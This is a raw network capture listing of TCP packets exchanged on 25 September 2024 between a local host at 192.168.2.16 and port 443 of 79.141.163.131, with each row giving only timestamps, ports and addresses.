                                                                              Sep 25, 2024 19:02:35.587296963 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587328911 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587341070 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587400913 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587400913 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587743998 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587804079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587837934 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587851048 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.587903023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.587938070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588665009 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588721037 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588762045 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588774920 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.588812113 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.588851929 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589159012 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589224100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589250088 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589262962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589298964 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589332104 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589572906 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589637041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589674950 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589687109 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.589725971 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.589755058 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590090036 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590156078 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590193033 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590205908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.590249062 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.590266943 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681652069 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681727886 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681830883 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681855917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.681937933 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.681972980 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686451912 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686516047 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686558008 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686572075 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686602116 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686628103 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686877966 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686934948 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.686970949 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.686984062 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687022924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687048912 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687618017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687676907 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687709093 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687721014 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.687751055 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.687791109 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694114923 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694138050 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694247007 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694262981 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694336891 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694610119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694631100 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694708109 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.694721937 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.694792986 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.695002079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695020914 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695099115 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.695112944 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.695178032 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.698889017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.698946953 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.699028015 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.699042082 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.699114084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771541119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771600008 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771646023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771682024 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.771703005 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.771743059 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.773904085 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.773967028 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.773993969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.774003983 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.774040937 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.774068117 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779556990 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779613972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779638052 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779648066 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.779685020 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.779712915 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780706882 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780761003 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780806065 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780819893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.780848026 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.780915976 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794593096 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794675112 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794703007 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794723034 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794753075 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794785023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.794914007 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.794967890 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795008898 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795022011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795059919 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795101881 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795770884 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795847893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795874119 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795887947 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.795947075 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.795984983 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797266006 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797337055 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797364950 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797378063 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.797405005 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.797441006 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.857741117 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857814074 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857848883 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.857947111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.857995987 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.858023882 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860189915 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860246897 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860277891 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860328913 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.860371113 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.860397100 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865149975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865240097 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865251064 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865272999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865304947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865333080 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865827084 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865894079 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865922928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865931034 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.865958929 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.865983009 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.882858038 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.882916927 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.882960081 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.882988930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883019924 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883042097 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883343935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883431911 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883447886 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883464098 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883500099 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883522034 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883796930 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883860111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883892059 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883903980 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.883939028 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.883955956 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:35.886734962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:35.886792898 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.611975908 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.611984968 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612066031 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612088919 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.612128019 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.612164974 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.612209082 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613509893 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613527060 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613600969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613615990 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613672972 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.613883972 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613900900 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.613972902 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614001989 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614068031 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614339113 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614355087 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614430904 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614444971 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614514112 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614739895 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614754915 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614844084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.614857912 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.614927053 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618299961 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618315935 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618391991 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618407011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618475914 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618859053 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618877888 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.618956089 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.618969917 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.619038105 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620079041 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620094061 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620176077 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620189905 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620259047 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620552063 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620567083 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620646954 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.620661020 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.620728970 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.623580933 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623594999 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623673916 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.623688936 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.623771906 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624115944 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624130011 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624228954 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624243975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624314070 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624526024 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624540091 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624630928 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624645948 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624712944 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.624954939 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.624972105 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.625056028 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.625070095 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.625139952 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.628611088 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.628629923 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.628707886 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.628722906 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.628787041 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.629019022 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629033089 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629115105 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.629127979 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629201889 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.629484892 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629506111 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629584074 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.629600048 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629673004 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.629895926 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629909992 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.629993916 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.630007029 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.630080938 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.633759975 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.633774996 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.633853912 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.633867979 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.633934975 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.638612032 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.638628006 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.638706923 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.638721943 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.638792038 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.639552116 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.639566898 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.639645100 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.639658928 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.639743090 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.643372059 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.643415928 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.643486023 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.643501043 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.643531084 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.643553972 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.644149065 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.644165993 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.644242048 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.644260883 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.644330025 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.647124052 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647138119 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647212029 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.647226095 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647283077 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.647758961 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647773981 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647850037 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.647864103 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.647924900 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.649224997 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649240017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649333000 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.649347067 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649425030 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.649770021 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649785042 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649862051 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.649876118 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.649944067 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.651288986 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.651303053 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.651381969 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.651417017 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.651485920 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.652700901 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.652714968 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.652796030 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.652811050 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.652878046 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.653915882 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.653930902 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.654007912 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.654021978 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.654093981 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.655679941 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.655694962 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.655769110 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.655782938 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.655859947 CEST49705443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:37.656534910 CEST4434970579.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:37.656554937 CEST4434970579.141.163.131192.168.2.16
